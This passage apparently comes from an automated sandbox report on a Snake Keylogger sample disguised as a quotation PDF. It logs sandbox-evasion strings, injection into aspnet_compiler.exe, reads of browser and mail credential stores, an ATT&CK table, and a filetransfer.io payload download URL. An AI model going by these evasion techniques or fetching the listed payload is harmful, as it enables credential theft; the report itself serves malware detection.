Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595442	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594313	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593809	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593636	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594516	Jump to behavior

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D6A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D6A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:Microsoft\|VMWare\|Virtual
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D6A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D6A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D6A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D6A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: explorerESbieDll.dllFcuckoomon.dllGwin32_process.handle='{0}'HParentProcessIdIcmdJselect * from Win32_BIOS8Unexpected WMI query failureKversionLSerialNumberNVMware\|VIRTUAL\|A M I\|XenOselect * from Win32_ComputerSystemPmanufacturerQmodelRMicrosoft\|VMWare\|VirtualSjohnTannaUxxxxxxxx
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1921577651.0000017A0BAA7000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2657199688.000001AE694DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Thread created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe EIP: 692A0000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 1AE692A0000

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1ae100100e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2654091935.000001AE0024B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2654091935.000001AE00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 7848, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1ae100100e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 7848, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1ae100100e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2654091935.000001AE0024B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2654091935.000001AE00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 7848, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 Scheduled Task/Job	211 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	41 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	211 Process Injection	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	21 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	13%	ReversingLabs
QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	28%	Virustotal	Browse
QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
filetransfer.io	1%	Virustotal	Browse
reallyfreegeoip.org	0%	Virustotal	Browse
s20.filetransfer.io	1%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://stackoverflow.com/q/14436606/23354	0%	URL Reputation	safe
https://stackoverflow.com/q/11564914/23354;	0%	URL Reputation	safe
https://stackoverflow.com/q/2152978/23354	0%	URL Reputation	safe
https://stackoverflow.com/q/2152978/23354	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://github.com/mgravell/protobuf-neti	0%	Virustotal		Browse
http://filetransfer.io/data-package/MlZtCPkK/download	1%	Virustotal		Browse
https://filetransfer.io/data-package/MlZtCPkK/download	1%	Virustotal		Browse
https://github.com/mgravell/protobuf-net	0%	Virustotal		Browse
https://github.com/mgravell/protobuf-netJ	0%	Virustotal		Browse
https://filetransfer.io	2%	Virustotal		Browse
https://s20.filetransfer.io	1%	Virustotal		Browse
http://filetransfer.io	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
filetransfer.io	188.114.97.3	true	false	1%, Virustotal, Browse	unknown
reallyfreegeoip.org	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
s20.filetransfer.io	188.114.96.3	true	false	1%, Virustotal, Browse	unknown
checkip.dyndns.com	158.101.44.242	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://filetransfer.io/data-package/MlZtCPkK/download	false	1%, Virustotal, Browse	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://filetransfer.io/data-package/MlZtCPkK/download	false	1%, Virustotal, Browse	unknown
https://s20.filetransfer.io/storage/download/LuTcDMs7R8e5	false		unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.33p	aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00113000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/mgravell/protobuf-neti	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://stackoverflow.com/q/14436606/23354	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D6A4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-netJ	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://stackoverflow.com/q/11564914/23354;	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/2152978/23354	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://checkip.dyndns.org/q	aspnet_compiler.exe, 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://reallyfreegeoip.org	aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001CA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00238000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00226000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001F1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001DE000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00132000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001B7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://filetransfer.io	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D61A000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
https://github.com/mgravell/protobuf-net	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://reallyfreegeoip.org	aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001CA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00113000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00238000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00226000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001F1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00161000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001DE000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001B7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001B7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://s20.filetransfer.io	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D64B000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://checkip.dyndns.com	aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001CA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00113000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00238000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00226000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001F1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001DE000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001B7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
